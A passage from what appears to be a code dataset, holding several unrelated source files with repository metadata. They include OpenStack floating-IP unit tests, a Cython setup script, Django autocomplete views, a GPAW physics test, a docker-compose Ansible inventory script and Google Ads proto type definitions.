"id": "2c9adcb5-c123-4c5a-a2ba-1ad4c4e1481f",
"description": ""
}]}),
dict(method='GET',
uri='https://network.example.com/v2.0/subnets.json',
json={"subnets": [{
"description": "",
"enable_dhcp": True,
"network_id": "2c9adcb5-c123-4c5a-a2ba-1ad4c4e1481f",
"tenant_id": "65222a4d09ea4c68934fa1028c77f394",
"created_at": "2016-10-22T13:46:26",
"dns_nameservers": [
"89.36.90.101",
"89.36.90.102"],
"updated_at": "2016-10-22T13:46:26",
"gateway_ip": "10.4.0.1",
"ipv6_ra_mode": None,
"allocation_pools": [{
"start": "10.4.0.2",
"end": "10.4.0.200"}],
"host_routes": [],
"ip_version": 4,
"ipv6_address_mode": None,
"cidr": "10.4.0.0/24",
"id": "f0ad1df5-53ee-473f-b86b-3604ea5591e9",
"subnetpool_id": None,
"name": "private-subnet-ipv4",
}]})])
self.cloud.add_ips_to_server(
munch.Munch(
id='f80e3ad0-e13e-41d4-8e9c-be79bccdb8f7',
addresses={
"private": [{
"OS-EXT-IPS-MAC:mac_addr": "fa:16:3e:e8:7f:03",
"version": 4,
"addr": "10.4.0.16",
"OS-EXT-IPS:type": "fixed"
}]}),
ip_pool='ext-net', reuse=False)
self.assert_calls()
def test_available_floating_ip_new(self):
self.register_uris([
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'networks.json']),
json={'networks': [self.mock_get_network_rep]}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'subnets.json']),
json={'subnets': []}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': []}),
dict(method='POST',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
validate=dict(
json={'floatingip': {
'floating_network_id': 'my-network-id'}}),
json=self.mock_floating_ip_new_rep)
])
ip = self.cloud.available_floating_ip(network='my-network')
self.assertEqual(
self.mock_floating_ip_new_rep['floatingip']['floating_ip_address'],
ip['floating_ip_address'])
self.assert_calls()
def test_delete_floating_ip_existing(self):
fip_id = '2f245a7b-796b-4f26-9cf9-9e82d248fda7'
fake_fip = {
'id': fip_id,
'floating_ip_address': '172.99.106.167',
'status': 'ACTIVE',
}
self.register_uris([
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(fip_id)]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [fake_fip]}),
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(fip_id)]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [fake_fip]}),
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(fip_id)]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': []}),
])
self.assertTrue(
self.cloud.delete_floating_ip(floating_ip_id=fip_id, retry=2))
self.assert_calls()
def test_delete_floating_ip_existing_down(self):
fip_id = '2f245a7b-796b-4f26-9cf9-9e82d248fda7'
fake_fip = {
'id': fip_id,
'floating_ip_address': '172.99.106.167',
'status': 'ACTIVE',
}
down_fip = {
'id': fip_id,
'floating_ip_address': '172.99.106.167',
'status': 'DOWN',
}
self.register_uris([
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(fip_id)]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [fake_fip]}),
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(fip_id)]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [down_fip]}),
])
self.assertTrue(
self.cloud.delete_floating_ip(floating_ip_id=fip_id, retry=2))
self.assert_calls()
def test_delete_floating_ip_existing_no_delete(self):
fip_id = '2f245a7b-796b-4f26-9cf9-9e82d248fda7'
fake_fip = {
'id': fip_id,
'floating_ip_address': '172.99.106.167',
'status': 'ACTIVE',
}
self.register_uris([
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(fip_id)]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [fake_fip]}),
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(fip_id)]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [fake_fip]}),
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(fip_id)]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [fake_fip]}),
])
self.assertRaises(
exc.OpenStackCloudException,
self.cloud.delete_floating_ip,
floating_ip_id=fip_id, retry=2)
self.assert_calls()
def test_delete_floating_ip_not_found(self):
self.register_uris([
dict(method='DELETE',
uri=('https://network.example.com/v2.0/floatingips/'
'a-wild-id-appears.json'),
status_code=404)])
ret = self.cloud.delete_floating_ip(
floating_ip_id='a-wild-id-appears')
self.assertFalse(ret)
self.assert_calls()
def test_attach_ip_to_server(self):
fip = self.mock_floating_ip_list_rep['floatingips'][0]
device_id = self.fake_server['id']
self.register_uris([
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'ports.json'],
qs_elements=["device_id={0}".format(device_id)]),
json={'ports': self.mock_search_ports_rep}),
dict(method='PUT',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(
fip['id'])]),
json={'floatingip': fip},
validate=dict(
json={'floatingip': {
'port_id': self.mock_search_ports_rep[0]['id'],
'fixed_ip_address': self.mock_search_ports_rep[0][
'fixed_ips'][0]['ip_address']}})),
])
self.cloud._attach_ip_to_server(
server=self.fake_server,
floating_ip=self.floating_ip)
self.assert_calls()
def test_add_ip_refresh_timeout(self):
device_id = self.fake_server['id']
self.register_uris([
dict(method='GET',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'networks.json']),
json={'networks': [self.mock_get_network_rep]}),
dict(method='GET',
uri='https://network.example.com/v2.0/subnets.json',
json={'subnets': []}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'ports.json'],
qs_elements=["device_id={0}".format(device_id)]),
json={'ports': self.mock_search_ports_rep}),
dict(method='POST',
uri='https://network.example.com/v2.0/floatingips.json',
json={'floatingip': self.floating_ip},
validate=dict(
json={'floatingip': {
'floating_network_id': 'my-network-id',
'fixed_ip_address': self.mock_search_ports_rep[0][
'fixed_ips'][0]['ip_address'],
'port_id': self.mock_search_ports_rep[0]['id']}})),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [self.floating_ip]}),
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(
self.floating_ip['id'])]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': []}),
])
self.assertRaises(
exc.OpenStackCloudTimeout,
self.cloud._add_auto_ip,
server=self.fake_server,
wait=True, timeout=0.01,
reuse=False)
self.assert_calls()
def test_detach_ip_from_server(self):
fip = self.mock_floating_ip_new_rep['floatingip']
attached_fip = copy.copy(fip)
attached_fip['port_id'] = 'server-port-id'
self.register_uris([
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [attached_fip]}),
dict(method='PUT',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(
fip['id'])]),
json={'floatingip': fip},
validate=dict(
json={'floatingip': {'port_id': None}}))
])
self.cloud.detach_ip_from_server(
server_id='server-id',
floating_ip_id=fip['id'])
self.assert_calls()
def test_add_ip_from_pool(self):
network = self.mock_get_network_rep
fip = self.mock_floating_ip_new_rep['floatingip']
fixed_ip = self.mock_search_ports_rep[0]['fixed_ips'][0]['ip_address']
port_id = self.mock_search_ports_rep[0]['id']
self.register_uris([
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'networks.json']),
json={'networks': [network]}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'subnets.json']),
json={'subnets': []}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [fip]}),
dict(method='POST',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingip': fip},
validate=dict(
json={'floatingip': {
'floating_network_id': network['id']}})),
dict(method="GET",
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'ports.json'],
qs_elements=[
"device_id={0}".format(self.fake_server['id'])]),
json={'ports': self.mock_search_ports_rep}),
dict(method='PUT',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(
fip['id'])]),
json={'floatingip': fip},
validate=dict(
json={'floatingip': {
'fixed_ip_address': fixed_ip,
'port_id': port_id}})),
])
server = self.cloud._add_ip_from_pool(
server=self.fake_server,
network=network['id'],
fixed_address=fixed_ip)
self.assertEqual(server, self.fake_server)
self.assert_calls()
def test_cleanup_floating_ips(self):
floating_ips = [{
"id": "this-is-a-floating-ip-id",
"fixed_ip_address": None,
"internal_network": None,
"floating_ip_address": "203.0.113.29",
"network": "this-is-a-net-or-pool-id",
"port_id": None,
"status": "ACTIVE"
}, {
"id": "this-is-an-attached-floating-ip-id",
"fixed_ip_address": None,
"internal_network": None,
"floating_ip_address": "203.0.113.29",
"network": "this-is-a-net-or-pool-id",
"attached": True,
"port_id": "this-is-id-of-port-with-fip",
"status": "ACTIVE"
}]
self.register_uris([
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': floating_ips}),
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(
floating_ips[0]['id'])]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [floating_ips[1]]}),
])
self.cloud.delete_unattached_floating_ips()
self.assert_calls()
def test_create_floating_ip_no_port(self):
server_port = {
"id": "port-id",
"device_id": "some-server",
'created_at': datetime.datetime.now().isoformat(),
'fixed_ips': [
{
'subnet_id': 'subnet-id',
'ip_address': '172.24.4.2'
}
],
}
floating_ip = {
"id": "floating-ip-id",
"port_id": None
}
self.register_uris([
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'networks.json']),
json={'networks': [self.mock_get_network_rep]}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'subnets.json']),
json={'subnets': []}),
dict(method="GET",
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'ports.json'],
qs_elements=['device_id=some-server']),
json={'ports': [server_port]}),
dict(method='POST',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingip': floating_ip})
])
self.assertRaises(
exc.OpenStackCloudException,
self.cloud._neutron_create_floating_ip,
server=dict(id='some-server'))
self.assert_calls()
|
apache-2.0
| -3,525,956,898,842,083,300
| 40.101
| 91
| 0.467069
| false
| 3.734418
| true
| false
| false
|
bblais/plasticity
|
setup.py
|
1
|
2798
|
# this is from https://github.com/cython/cython/wiki/PackageHierarchy
import sys, os, stat, subprocess
from distutils.core import setup
from distutils.extension import Extension
# we'd better have Cython installed, or it's a no-go
try:
    from Cython.Distutils import build_ext
except ImportError:
print("You don't seem to have Cython installed. Please get a")
print("copy from www.cython.org and install it")
sys.exit(1)
import numpy
def get_version(package):
d={}
version_line=''
with open('%s/version.py' % package) as fid:
for line in fid:
if line.startswith('version='):
version_line=line
print(version_line)
exec(version_line,d)
return d['version']
# scan the directory for extension files, converting
# them to extension names in dotted notation
def scandir(dir, files=[]):
for file in os.listdir(dir):
path = os.path.join(dir, file)
if os.path.isfile(path) and path.endswith(".pyx"):
files.append(path.replace(os.path.sep, ".")[:-4])
elif os.path.isdir(path):
scandir(path, files)
return files
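# Illustrative example (assuming a file plasticity/dialogs/foo.pyx exists):
# scandir("plasticity") would return dotted names such as
# ["plasticity.dialogs.foo"], which makeExtension() below maps back to a
# .pyx path for Cython to compile.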
def cleanc(dir):
for file in os.listdir(dir):
path = os.path.join(dir, file)
if os.path.isfile(path) and path.endswith(".pyx"):
base,ext=os.path.splitext(path)
cpath=base+'.c'
if os.path.isfile(cpath):
os.remove(cpath)
print("~~",cpath)
elif os.path.isdir(path):
cleanc(path)
# generate an Extension object from its dotted name
def makeExtension(extName):
extPath = extName.replace(".", os.path.sep)+".pyx"
folder=extName.split(".")[0]
return Extension(
extName,
[extPath,'plasticity/randomkit.c'],
include_dirs = [numpy.get_include(), ".", "%s/" % folder], # adding the '.' to include_dirs is CRUCIAL!!
extra_compile_args = ["-O3", "-Wall"],
extra_link_args = ['-g'],
)
# get the list of extensions
extNames = scandir("plasticity")
print(extNames)
cleanc("plasticity")
# and build up the set of Extension objects
print(extNames)
extensions = [makeExtension(name) for name in extNames]
# finally, we can pass all this to distutils
setup(
name="plasticity",
version=get_version('plasticity'),
description="Synaptic Plasticity in Rate-Based Neurons",
author="Brian Blais",
packages=['plasticity',
'plasticity.dialogs',
'plasticity.dialogs.waxy'],
scripts=['plasticity/Plasticity.pyw'],
package_data={'plasticity': ['images/*.*','dialogs/images/*.*',
'dialogs/images/learning_rules/*.*','hdf5/*.*']},
ext_modules=extensions,
cmdclass = {'build_ext': build_ext},
)
|
mit
| -212,955,220,237,154,800
| 29.086022
| 114
| 0.62366
| false
| 3.578005
| false
| false
| false
|
dslackw/sbo-templates
|
sbo_templates/__metadata__.py
|
1
|
1203
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# __metadata__.py file is part of sbo-templates.
# Copyright 2015-2021 Dimitris Zlatanidis <d.zlatanidis@gmail.com>
# All rights reserved.
# SBo tool for managing templates.
# https://gitlab.com/dslackw/sbo-templates
# sbo-templates is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
__prog__ = "sbo-templates"
__author__ = "dslackw"
__copyright__ = "2015-2021"
__version_info__ = (1, 3, 2)
__version__ = "{0}.{1}.{2}".format(*__version_info__)
__license__ = "GNU General Public License v3 (GPLv3)"
__email__ = "d.zlatanidis@gmail.com"
__website__ = "https://gitlab.com/dslackw/sbo-templates"
|
gpl-3.0
| -942,446,830,145,835,600
| 36.59375
| 71
| 0.717373
| false
| 3.379213
| false
| false
| false
|
mozilla/pto
|
pto/apps/autocomplete/views.py
|
1
|
1912
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import logging
from django import http
from pto.apps.dates.decorators import json_view
from pto.apps.users.models import UserProfile, User
from pto.apps.users.utils import ldap_lookup
@json_view
def cities(request):
if not request.user.is_authenticated():
return http.HttpResponseForbidden('Must be logged in')
data = []
term = request.GET.get('term')
qs = UserProfile.objects.exclude(city='')
if term:
qs = qs.filter(city__istartswith=term)
for each in (qs
.values('city')
.distinct()
.order_by('city')):
city = each['city']
data.append(city)
return data
@json_view
def users(request, known_only=False):
if not request.user.is_authenticated():
return http.HttpResponseForbidden('Must be logged in')
query = request.GET.get('term').strip()
if len(query) < 2:
return []
results = []
# I chose a limit of 30 because there are about 20+ 'peter'
# something in mozilla
for each in ldap_lookup.search_users(query, 30, autocomplete=True):
if not each.get('givenName'):
logging.warn("Skipping LDAP entry %s" % each)
continue
if known_only:
if not User.objects.filter(email__iexact=each['mail']).exists():
continue
full_name_and_email = '%s %s <%s>' % (each['givenName'],
each['sn'],
each['mail'])
result = {'id': each['uid'],
'label': full_name_and_email,
'value': full_name_and_email}
results.append(result)
return results
|
mpl-2.0
| 9,029,721,242,809,781,000
| 34.407407
| 76
| 0.578452
| false
| 4.016807
| false
| false
| false
|
ajylee/gpaw-rtxs
|
gpaw/test/diamond_gllb.py
|
1
|
2143
|
from ase.structure import bulk
from sys import argv
from ase.dft.kpoints import ibz_points, get_bandpath
from gpaw import *
from ase import *
from gpaw.test import gen
from gpaw import setup_paths
import os
"""This calculation has the following structure.
1) Calculate the ground state of Diamond.
2) Calculate the band structure of diamond in order to obtain accurate KS band gap for Diamond.
3) Calculate ground state again, and calculate the potential discontinuity using accurate band gap.
4) Calculate band structure again, and apply the discontinuity to CBM.
Compare to reference.
"""
xc = 'GLLBSC'
gen('C',xcname=xc)
setup_paths.insert(0, '.')
# Calculate ground state
atoms = bulk('C', 'diamond', a=3.567)
calc = GPAW(h=0.15, kpts=(4,4,4), xc=xc, nbands = 6, eigensolver='cg')
atoms.set_calculator(calc)
atoms.get_potential_energy()
calc.write('Cgs.gpw')
# Calculate accurate KS-band gap from band structure
points = ibz_points['fcc']
# CMB is in G-X
G = points['Gamma']
X = points['X']
#W = points['W']
#K = points['K']
#L = points['L']
#[W, L, G, X, W, K]
kpts, x, X = get_bandpath([G, X], atoms.cell, npoints=12)
calc = GPAW('Cgs.gpw', kpts=kpts, fixdensity=True, usesymm=None, convergence=dict(bands=6))
calc.get_atoms().get_potential_energy()
# Get the accurate KS-band gap
homolumo = calc.occupations.get_homo_lumo(calc.wfs)
homo, lumo = homolumo
print "band gap ",(lumo-homo)*27.2
# Redo the ground state calculation
calc = GPAW(h=0.15, kpts=(4,4,4), xc=xc, nbands = 6, eigensolver='cg')
atoms.set_calculator(calc)
atoms.get_potential_energy()
# And calculate the discontinuity potential with accurate band gap
response = calc.hamiltonian.xc.xcs['RESPONSE']
response.calculate_delta_xc(homolumo=homolumo)
calc.write('CGLLBSC.gpw')
# Redo the band structure calculation
atoms, calc = restart('CGLLBSC.gpw', kpts=kpts, fixdensity=True, usesymm=None, convergence=dict(bands=6))
atoms.get_potential_energy()
response = calc.hamiltonian.xc.xcs['RESPONSE']
KS, dxc = response.calculate_delta_xc_perturbation()
assert abs(KS+dxc-5.41)<0.10
#M. Kuisma et. al, Phys. Rev. B 82, 115106, QP gap for C, 5.41eV, expt. 5.48eV
|
gpl-3.0
| 7,119,025,400,674,546,000
| 30.985075
| 105
| 0.728885
| false
| 2.747436
| false
| false
| false
|
discoapi/discotech
|
discotech/discoAPI/keywordManager.py
|
1
|
3203
|
__package__ = 'discotech.discoAPI'
import json
from discotech import discotechError
class KeywordManager(object):
"""
Simple object to store and queue keyword to search in social media providers
"""
def __init__(self,keywords = [],convertToSearchPhrases = False):
"""
@type keywords: list
        @param keywords: the keywords you want to search for
        @type convertToSearchPhrases: bool
        @param convertToSearchPhrases: whether each keyword should be converted to matching search phrases, for example 'spider man' => ['spider','man','spiderman','spider_man']
"""
if keywords:
self.keywords = self._keyworsToSearchPhrases(keywords) if convertToSearchPhrases else list(keywords)
self._keywordCount = len(self.keywords)
self._headLocation = 0
else:
self.keywords = keywords
def dequque(self):
"""
        Dequeue a keyword from the queue; the keyword is then moved to the end of the queue
@return: the next keyword in queue
"""
if not self.keywords:
raise discotechError("you don't any keywords")
retValue = self.keywords[self._headLocation]
# move head next
self._headLocation = (self._headLocation + 1) % self._keywordCount
return retValue
def _updateFromList(self,keywords):
self.keywords = list(keywords)
self._keywordCount = len(self.keywords)
self._headLocation = 0
def _updateFromDict(self,config):
if 'keywords' in config:
convertToSearchPhrases = False
if 'search_phrase' in config and config['search_phrase'] is True:
convertToSearchPhrases = True
self.keywords = self._keyworsToSearchPhrases(config['keywords']) if convertToSearchPhrases else list(config['keywords'])
self._keywordCount = len(self.keywords)
self._headLocation = 0
else:
raise discotechError("no keywords were given")
def _keyworToSearchPhrases(self,keyword):
words = keyword.split(' ')
#edge case
if len(words) == 1:
return words
cleanWords = []
#cleanup stage
for word in words:
word = word.strip()
if word != '':
cleanWords.append(word)
#combinator stage
combinators = ['','_']
combinedWords = []
for combinator in combinators:
combinedWords.append(combinator.join(cleanWords))
return cleanWords + combinedWords
def _keyworsToSearchPhrases(self,keywords):
retList = []
for keyword in keywords:
retList += self._keyworToSearchPhrases(keyword)
return retList
def loadConfig(self,config):
"""
        load keywords from a configuration
        @type config: list | str
        @param config: a list of keywords, or a path or URL of a JSON configuration file
"""
#if it's list
if type(config) is list:
self._updateFromList(config)
#if it's a dict
if type(config) is dict:
self._updateFromDict(config)
#if it's string
if type(config) is str:
#could be an address
if config.startswith('http://') or config.startswith('https://'):
configFile = getUrlContents(config)
confList = json.loads(configFile['response_text'])
                #recursively call yourself
return self.loadConfig(confList)
#could be file name
confFile = open(config,'r')
            confList = json.loads(confFile.read())
            #recursively call yourself
return self.loadConfig(confList)
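# Minimal usage sketch (hypothetical keywords, not part of the original module):
#   km = KeywordManager(['spider man'], convertToSearchPhrases=True)
#   km.dequque()   # -> 'spider'
#   km.dequque()   # -> 'man'  (the queue keeps rotating: 'spiderman', 'spider_man', then 'spider' again)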
|
gpl-2.0
| -1,382,077,788,170,863,000
| 27.345133
| 163
| 0.70153
| false
| 3.496725
| true
| false
| false
|
ioggstream/python-course
|
ansible-101/notebooks/exercise-05/inventory-docker-solution.py
|
1
|
1376
|
#!/usr/bin/env python
# List our containers. Note: this only works with docker-compose containers.
from __future__ import print_function
from collections import defaultdict
import json
#
# Manage different docker libraries
#
try:
from docker import Client
except ImportError:
from docker import APIClient as Client
import logging
log = logging.getLogger()
logging.basicConfig(level=logging.DEBUG)
def print_hosts():
c=Client(base_url="http://172.17.0.1:2375")
container_fmt = lambda x: (
x['Names'][0][1:],
x['NetworkSettings']['Networks']['bridge']['IPAddress'],
)
inventory = dict()
for x in c.containers():
log.debug("Processing entry %r", '\t\t'.join(container_fmt(x)))
try:
group_name = x['Labels']['com.docker.compose.service']
ip_address = x['NetworkSettings']['Networks']['bridge']['IPAddress']
if group_name not in inventory:
inventory[group_name] = defaultdict(list)
inventory[group_name]['hosts'].append(ip_address)
except KeyError:
log.warning("Host not run via docker-compose: skipping")
inventory['web']['host_vars'] = {'ansible_ssh_common_args': ' -o StrictHostKeyChecking=no '}
ret = json.dumps(inventory, indent=True)
return ret
if __name__ == '__main__':
print(print_hosts())
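# Example of the emitted inventory shape (illustrative service names and addresses only):
# {
#  "web": {"hosts": ["172.17.0.3"], "host_vars": {"ansible_ssh_common_args": " -o StrictHostKeyChecking=no "}},
#  "db": {"hosts": ["172.17.0.4"]}
# }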
|
agpl-3.0
| -8,088,468,184,198,138,000
| 28.913043
| 96
| 0.634448
| false
| 3.965418
| false
| false
| false
|
googleapis/googleapis-gen
|
google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/common/types/ad_type_infos.py
|
1
|
46175
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v8.common.types import ad_asset
from google.ads.googleads.v8.enums.types import call_conversion_reporting_state
from google.ads.googleads.v8.enums.types import display_ad_format_setting
from google.ads.googleads.v8.enums.types import display_upload_product_type as gage_display_upload_product_type
from google.ads.googleads.v8.enums.types import legacy_app_install_ad_app_store
from google.ads.googleads.v8.enums.types import mime_type as gage_mime_type
__protobuf__ = proto.module(
package='google.ads.googleads.v8.common',
marshal='google.ads.googleads.v8',
manifest={
'TextAdInfo',
'ExpandedTextAdInfo',
'ExpandedDynamicSearchAdInfo',
'HotelAdInfo',
'ShoppingSmartAdInfo',
'ShoppingProductAdInfo',
'ShoppingComparisonListingAdInfo',
'GmailAdInfo',
'GmailTeaser',
'DisplayCallToAction',
'ProductImage',
'ProductVideo',
'ImageAdInfo',
'VideoBumperInStreamAdInfo',
'VideoNonSkippableInStreamAdInfo',
'VideoTrueViewInStreamAdInfo',
'VideoOutstreamAdInfo',
'VideoTrueViewDiscoveryAdInfo',
'VideoAdInfo',
'VideoResponsiveAdInfo',
'ResponsiveSearchAdInfo',
'LegacyResponsiveDisplayAdInfo',
'AppAdInfo',
'AppEngagementAdInfo',
'LegacyAppInstallAdInfo',
'ResponsiveDisplayAdInfo',
'LocalAdInfo',
'DisplayUploadAdInfo',
'ResponsiveDisplayAdControlSpec',
'SmartCampaignAdInfo',
'CallAdInfo',
},
)
class TextAdInfo(proto.Message):
r"""A text ad.
Attributes:
headline (str):
The headline of the ad.
description1 (str):
The first line of the ad's description.
description2 (str):
The second line of the ad's description.
"""
headline = proto.Field(
proto.STRING,
number=4,
optional=True,
)
description1 = proto.Field(
proto.STRING,
number=5,
optional=True,
)
description2 = proto.Field(
proto.STRING,
number=6,
optional=True,
)
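# Illustrative usage sketch (not part of the generated API surface): proto-plus
# messages such as TextAdInfo are typically built with keyword arguments, e.g.
#   info = TextAdInfo(headline="Spring sale", description1="Save now")
# The field values shown here are hypothetical.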
class ExpandedTextAdInfo(proto.Message):
r"""An expanded text ad.
Attributes:
headline_part1 (str):
The first part of the ad's headline.
headline_part2 (str):
The second part of the ad's headline.
headline_part3 (str):
The third part of the ad's headline.
description (str):
The description of the ad.
description2 (str):
The second description of the ad.
path1 (str):
The text that can appear alongside the ad's
displayed URL.
path2 (str):
Additional text that can appear alongside the
ad's displayed URL.
"""
headline_part1 = proto.Field(
proto.STRING,
number=8,
optional=True,
)
headline_part2 = proto.Field(
proto.STRING,
number=9,
optional=True,
)
headline_part3 = proto.Field(
proto.STRING,
number=10,
optional=True,
)
description = proto.Field(
proto.STRING,
number=11,
optional=True,
)
description2 = proto.Field(
proto.STRING,
number=12,
optional=True,
)
path1 = proto.Field(
proto.STRING,
number=13,
optional=True,
)
path2 = proto.Field(
proto.STRING,
number=14,
optional=True,
)
class ExpandedDynamicSearchAdInfo(proto.Message):
r"""An expanded dynamic search ad.
Attributes:
description (str):
The description of the ad.
description2 (str):
The second description of the ad.
"""
description = proto.Field(
proto.STRING,
number=3,
optional=True,
)
description2 = proto.Field(
proto.STRING,
number=4,
optional=True,
)
class HotelAdInfo(proto.Message):
r"""A hotel ad. """
class ShoppingSmartAdInfo(proto.Message):
r"""A Smart Shopping ad. """
class ShoppingProductAdInfo(proto.Message):
r"""A standard Shopping ad. """
class ShoppingComparisonListingAdInfo(proto.Message):
r"""A Shopping Comparison Listing ad.
Attributes:
headline (str):
Headline of the ad. This field is required.
Allowed length is between 25 and 45 characters.
"""
headline = proto.Field(
proto.STRING,
number=2,
optional=True,
)
class GmailAdInfo(proto.Message):
r"""A Gmail ad.
Attributes:
teaser (google.ads.googleads.v8.common.types.GmailTeaser):
The Gmail teaser.
header_image (str):
The MediaFile resource name of the header
image. Valid image types are GIF, JPEG and PNG.
The minimum size is 300x100 pixels and the
aspect ratio must be between 3:1 and 5:1 (+-1%).
marketing_image (str):
The MediaFile resource name of the marketing
image. Valid image types are GIF, JPEG and PNG.
The image must either be landscape with a
minimum size of 600x314 pixels and aspect ratio
of 600:314 (+-1%) or square with a minimum size
of 300x300 pixels and aspect ratio of 1:1 (+-1%)
marketing_image_headline (str):
Headline of the marketing image.
marketing_image_description (str):
Description of the marketing image.
marketing_image_display_call_to_action (google.ads.googleads.v8.common.types.DisplayCallToAction):
Display-call-to-action of the marketing
image.
product_images (Sequence[google.ads.googleads.v8.common.types.ProductImage]):
Product images. Up to 15 images are
supported.
product_videos (Sequence[google.ads.googleads.v8.common.types.ProductVideo]):
Product videos. Up to 7 videos are supported.
At least one product video or a marketing image
must be specified.
"""
teaser = proto.Field(
proto.MESSAGE,
number=1,
message='GmailTeaser',
)
header_image = proto.Field(
proto.STRING,
number=10,
optional=True,
)
marketing_image = proto.Field(
proto.STRING,
number=11,
optional=True,
)
marketing_image_headline = proto.Field(
proto.STRING,
number=12,
optional=True,
)
marketing_image_description = proto.Field(
proto.STRING,
number=13,
optional=True,
)
marketing_image_display_call_to_action = proto.Field(
proto.MESSAGE,
number=6,
message='DisplayCallToAction',
)
product_images = proto.RepeatedField(
proto.MESSAGE,
number=7,
message='ProductImage',
)
product_videos = proto.RepeatedField(
proto.MESSAGE,
number=8,
message='ProductVideo',
)
class GmailTeaser(proto.Message):
r"""Gmail teaser data. The teaser is a small header that acts as
an invitation to view the rest of the ad (the body).
Attributes:
headline (str):
Headline of the teaser.
description (str):
Description of the teaser.
business_name (str):
Business name of the advertiser.
logo_image (str):
The MediaFile resource name of the logo
image. Valid image types are GIF, JPEG and PNG.
The minimum size is 144x144 pixels and the
aspect ratio must be 1:1 (+-1%).
"""
headline = proto.Field(
proto.STRING,
number=5,
optional=True,
)
description = proto.Field(
proto.STRING,
number=6,
optional=True,
)
business_name = proto.Field(
proto.STRING,
number=7,
optional=True,
)
logo_image = proto.Field(
proto.STRING,
number=8,
optional=True,
)
